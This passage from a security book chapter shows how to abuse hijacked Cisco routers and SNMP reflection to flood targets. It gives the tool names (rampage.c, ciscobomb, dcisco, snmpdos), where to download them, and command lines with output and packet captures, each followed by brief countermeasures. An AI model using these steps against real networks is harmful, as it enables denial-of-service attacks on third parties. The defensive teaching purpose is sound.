ABUSING CISCO APPLIANCES FOR NASTY DDOS DEEDS | Hacking Exposed Cisco Networks: Cisco Security Secrets & Solutions

While we have briefly discussed this in Chapter 10, we needed to expand on it without extending that chapter, which was already overstretched and loaded with relevant data. This seems to be a rather appropriate spot. While using hacked routers and switches to mass ping remote targets is not exactly the most sophisticated and intelligent DDoS attack in the universe, this threat exists and should be dealt with. At the end of the chapter we review one rather original reflective SNMP-based DDoS attack that requires only the knowledge of an RO community. So stay tuned .

Mass Cisco Pinging, the SNMP Way

Attack

Popularity:	4
Simplicity:	4
Impact:	9
*Risk Rating:*	6

Taking into account the large amount of SNMP-enabled routers and switches on the Internet, you might find Cisco-ping.sh very useful. It allows your router to be used to pingflood the target. If the attacking appliance has a fat pipe, it might act as a very effective point for launching an attack that consumes network bandwidth of the target. Cisco-ping.sh is currently written for the Solaris platform but can be easily modified for use on Linux or BSD-based operating systems. You'll have to edit the script to change the locations of your SNMP tools and your routers/switches with enabled SNMP service. With a bit of code hacking, it is easy to add automated functionality to the tool that will take the list of available Cisco SNMP-enabled devices and use them together to launch a more effective attack.

SNMP Countermeasures

Countermeasure

It is highly advisable that you provide difficult-to-guess community names for your SNMP services. The best solution is to use SNMPv3, as it provides better authentication methods and encryption of the SNMP queries and replies. Also, unless SNMP is required for day-to-day network management and monitoring, it is advisable that you disable the service altogether.

Mass Cisco Pinging, the Telnet Way MK I

Attack

Popularity:	6
Simplicity:	6
Impact:	9
*Risk Rating:*	7

Rampage.c is the tool considered to be heaven for every script kiddie on the planet who gets hold of a large amount of Cisco routers with enable passwords. It allows attackers to use a great number of routers to generate pingflood traffic and direct it to the targeted machine by spoofing an originating IP address. Download it from the PacketStorm security web site, compile it, and run it in a manner similar to this:

 $ gcc -o rampage rampage.c      $ ./rampage      argc is 1      rampage.c by slinkai and cpio      usage: ./rampage-64 <ip> <router-list> <routers to use> <packets-to-use< (<size>)

The first argument is the target IP address; <router-list> is obviously the file with a list of routers; <routers to use> is the amount of routers to use from the list; <packets-to-use> is the number of packets to send for each router; and <size> is the size of packets to send from each device.

The output from the tool in action looks similar to this:

 arhontus dos $ ./rampage 192.168.66.100 /tmp/cisco-list 5 10 100      argc is 6      statistics display      hitting 192.168.66.100 with 100 byte packets      hitting 192.168.66.100 5 many times.      status: connecting 1 to 192.168.66.202      success: socket 1      status: connecting 2 to 192.168.66.202      success: socket 2      status: connecting 3 to 192.168.66.202      success: socket 3      status: connecting 4 to 192.168.66.202      success: socket 4      status: connecting 5 to 192.168.66.202      success: socket 5      entering infitinte loop mode, ctrl-c to cancel

The traffic output looks like this:

 arhontus1 root # tcpdump -i eth0 -n host 192.168.66.202      tcpdump: verbose output suppressed, use -v or -vv for full protocol decode      listening on eth0, link-type EN10MB (Ethernet), capture size 68 bytes      19:50:11.588589 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 1564      19:50:11.588968 arp who-has 192.168.66.202 tell 192.168.66.100      19:50:11.593515 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 9572      19:50:11.597936 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 3410      19:50:11.600327 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 1564      19:50:11.601971 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 9572      19:50:11.603661 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 3410      <lines were omitted to save page count>

A simpler (and slower) mass pinger than Rampage is available through exploited IOS routers. Ciscobomb is written in Perl, and you can download it from http://www.blacksheepnetworks.com/security/hack/hack2/www.getrewted.com.ar/ . There's no easier way of mass pingflooding than this:

 arhontus # perl ciscobomb.pl -t 192.168.66.102 -p 100      >\> CISCOBOMB 0.7 / ca0s / getREWTED labs <<      [Target: 192.168.66.102] >\> Attack is started.      Just go to see TV and wait ... :)

The list of the hacked routers has to be stored in a routers.db file in a router IP: login password:enable password format.

Telnet MK I Countermeasure

Countermeasure

If you are a network administrator and experience a large amount of ICMP traffic originating from your routers, don't ignore it. Most likely, you are being used as an attacking node for programs similar to Rampage or one of the other tools described later in the chapter. The way to deal with this is to reconsider authentication methods used on your network devices. Limit all administrative services to the IPs and VLANs of legitimate users and systems administrators that actually require these services.

Mass Cisco Pinging, the Telnet Way MK II

Attack

Popularity:	7
Simplicity:	6
Impact:	9
*Risk Rating:*	7

dCisco-DoS.c is a next -generation, improved rampage.c code that can be successfully used to pingflood the target using a list of known Cisco routers. Along with using it to DDoS your IRC mates, dCisco-DoS.c can be implemented to test the network resilience to DDoS attacks after installing the new and expensive anti-DDoS boxes that your boss always wanted. Download it from http://www.packetstormsecurity.org/ by searching for dcisco . Compile it and run it in the following way:

 $ gcc -o dcisco dcisco.c      $./dcisco      Usage: ./dcisco <Target> <List> <Repeat Count> <Datagram size> <Password>      $ ./dcisco-noenable 192.168.66.100 /tmp/cisco-list 10 100 123456      Target:192.168.66.100      File:/tmp/cisco-list      Password:123456      Packet Size:100      Repeat Count:10      Routers:5      Router 1:192.168.66.202  success:1      .      .

Launching tcpdump on the target will show the success of the attack:

 # tcpdump -i eth0 -n      tcpdump: verbose output suppressed, use -v or -vv for full protocol decode      listening on eth0, link-type EN10MB (Ethernet), capture size 68 bytes      .      .      17:25:08.062826 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 4419      17:25:08.062991 IP 192.168.66.100 > 192.168.66.202: icmp 80: echo reply seq 4419      17:25:08.065926 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 4419      17:25:08.066054 IP 192.168.66.100 > 192.168.66.202: icmp 80: echo reply seq 4419      17:25:08.068204 IP 192.168.66.202 > 192.168.66.100: icmp 80: echo request seq 4419      .      .      20 packets captured      20 packets received by filter      0 packets dropped by kernel

Along with this tool, you'll need a lot of Cisco devices with known user /enable passwords; the more devices you have, the better your chances of taking down the target, cutting network connectivity, and overloading the target's CPU.

Telnet MK II Countermeasures

Countermeasure

The general solution here is to use good authentication methods for your Cisco devices and allow user/enable access to your appliance only by legitimate IPs, networks, and VLANs.

Mass Cisco Flood, the SNMP Way

Attack

Popularity:	9
Simplicity:	8
Impact:	10
*Risk Rating:*	9

The second generation of SNMP network flooding and D/DoS tools is a smart and effective way of spoofing network management protocol queries to consume the network bandwidth of the targeted host/network. It works by faking an SNMP BulkGet .1.3.6.1 request ( snmpbulkget -v2c <device> public internet-address command) to originate from a targeted machine. The BulkGet functionality sends the entire SNMP response in a single query, rather than sending an individual Management Information Base (MIB) in response to the request. This allows minimization of the originating spoofed attacker's traffic and generates a large amount of outgoing traffic with responding SNMP queries. The tool can be downloaded from http://www.packetstormsecurity.org by searching for snmpdos .

 arhontus dos # ./snmpdos      SNMP DoS v1.0      Usage: snmpdos [-t target ip_addr] [-f host file] [-l loop count]

The use of this tool is self-evident:

 arhontus dos # ./snmpdos -t 192.168.66.100 -f /tmp/cisco-list -l 10      80 packets sent      tcpdump -i eth0 -n host 192.168.66.202      tcpdump: verbose output suppressed, use -v or -vv for full protocol decode      listening on eth0, link-type EN10MB (Ethernet), capture size 68 bytes      .      .      18:41:41.908997 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]      18:41:41.910144 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]      18:41:41.911298 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]      18:41:41.912447 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]      18:41:41.913598 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(7) [snmp]      80 packets captured      80 packets received by filter      0 packets dropped by kernel

Looking at the command and generated output, you might ask the following question: How did we get 80 packets of generated output from the tool if we've specified a count of only 10 packets? The answer lies in the amount of routers listed in the <host file> as the tool applies the counter to each of the routers, switches, or other SNMP-enabled appliances listed in the file.

Let's take a closer look at the traffic generated by this tool. As you can see from the following output, the traffic originating from a targeted host is relatively small compared to that which was sent from the SNMP service of a router to the target:

 #---attacker traffic start---#      arhontus root # tcpdump -i eth0 -n host 192.168.66.202 -x -s 65535      tcpdump: verbose output suppressed, use -v or -vv for full protocol decode      listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes      19:04:32.102836 IP 192.168.66.100.161 > 192.168.66.202.161:  GetBulk(23)  N=0       M=100 .1.3.6.1      0x0000:  4500 0042 0417 0000 f511 bb14 c0a8 4264  E..B..........Bd      0x0010:  c0a8 42ca 00a1 00a1 002e 50e7 3024 0201  ..B.......P.0$..      0x0020:  0104 0670 7562 6c69 63a5 1702 047b 73cc  ...public....{s.      0x0030:  1302 0100 0201 6430 0930 0706 032b 0601  ......d0.0...+..      0x0040:  0500                                     ..      #---attacker traffic end--- #      #---target traffic start--- #      arhontus1 root # tcpdump -i eth0 -n host 192.168.66.202 -X -s 65535      tcpdump: verbose output suppressed, use -v or -vv for full protocol decode      listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes      18:39:29.755592 IP 192.168.66.202.161 > 192.168.66.100.161:  GetResponse(1353)        .1.3.6.1.2.1.1.1.0="Cisco Internetwork Operating System Software ^M^JIOS (tm)       C2600 Software (C2600-IK9O3S3-M), Version 12.3(6), RELEASE SOFTWARE       (fc3)^M^JCopyright (c) 1986-2004 by cisco Systems, Inc.^M^JCompiled Wed 11-Feb-04       19:24 by kellythw" .1.3.6.1.2.1.1.2.0=.1.3.6.1.4.1.9.1.186       .1.3.6.1.2.1.1.3.0=292780808 .1.3.6.1.2.1.1.4.0=""       .1.3.6.1.2.1.1.5.0="router.snmp.arhont.com" .1.3.6.1.2.1.1.6.0=""      .1.3.6.1.2.1.1.7.0=78 .1.3.6.1.2.1.1.8.0=0 .1.3.6.1.2.1.2.1.0=9       .1.3.6.1.2.1.2.2.1.1.1=1 .1.3.6.1.2.1.2.2.1.1.2=2 .1.3.6.1.2.1.2.2.1.1.3=3       .1.3.6.1.2.1.2.2.1.1.4=4 .1.3.6.1.2.1.2.2.1.1.5=5 .1.3.6.1.2.1.2.2.1.1.6=6       .1.3.6.1.2.1.2.2.1.1.8=8 .1.3.6.1.2.1.2.2.1.1.9=9 .1.3.6.1.2.1.2.2.1.1.10=10       .1.3.6.1.2.1.2.2.1.2.1="Ethernet0/0" .1.3.6.1.2.1.2.2.1.2.2="Serial0/0"       .1.3.6.1.2.1.2.2.1.2.3="Ethernet0/1" .1.3.6.1.2.1.2.2.1.2.4="Serial0/1"       .1.3.6.1.2.1.2.2.1.2.5="Null0" .1.3.6.1.2.1.2.2.1.2.6="Loopback0"       .1.3.6.1.2.1.2.2.1.2.8="Virtual-Template1" .1.3.6.1.2.1.2.2.1.2.9=      "Virtual-Access1" .1.3.6.1.2.1.2.2.1.2.10="Virtual-Access2"       .1.3.6.1.2.1.2.2.1.3.1=6 .1.3.6.1.2.1.2.2.1.3.2=23 .1.3.6.1.2.1.2.2.1.3.3=6       .1.3.6.1.2.1.2.2.1.3.4=22 .1.3.6.1.2.1.2.2.1.3.5=1 .1.3.6.1.2.1.2.2.1.3.6=24       .1.3.6.1.2.1.2.2.1.3.8=23 .1.3.6.1.2.1.2.2.1.3.9=23 .1.3.6.1.2.1.2.2.1.3.10=23       .1.3.6.1.2.1.2.2.1.4.1=1500 .1.3.6.1.2.1.2.2.1.4.2=1500       .1.3.6.1.2.1.2.2.1.4.3=1500 .1.3.6.1.2.1.2.2.1.4.4=1500       .1.3.6.1.2.1.2.2.1.4.5=1500 .1.3.6.1.2.1.2.2.1.4.6=1514       .1.3.6.1.2.1.2.2.1.4.8=1500 .1.3.6.1.2.1.2.2.1.4.9=1500       .1.3.6.1.2.1.2.2.1.4.10=1500 .1.3.6.1.2.1.2.2.1.5.1=10000000       .1.3.6.1.2.1.2.2.1.5.2=1544000 .1.3.6.1.2.1.2.2.1.5.3=10000000       .1.3.6.1.2.1.2.2.1.5.4=1544000 .1.3.6.1.2.1.2.2.1.5.5=4294967295       .1.3.6.1.2.1.2.2.1.5.6=4294967295 .1.3.6.1.2.1.2.2.1.5.8=100000000       .1.3.6.1.2.1.2.2.1.5.9=100000000 .1.3.6.1.2.1.2.2.1.5.10=100000000       .1.3.6.1.2.1.2.2.1.6.1=00_02_16_9c_0a_80 .1.3.6.1.2.1.2.2.1.6.2=""       .1.3.6.1.2.1.2.2.1.6.3=00_02_16_9c_0a_81      .      <output lines were omitted to save space>      #---target traffic end---#

SNMP Countermeasures

Countermeasure

It is highly advisable that you implement difficult-to-guess community names for your SNMP services. The best solution is to use SNMPv3, which provides better authentication methods and encryption of the SNMP queries and replies. Also, unless SNMP is required for day-to-day network management and monitoring, it is advisable to disable the service altogether.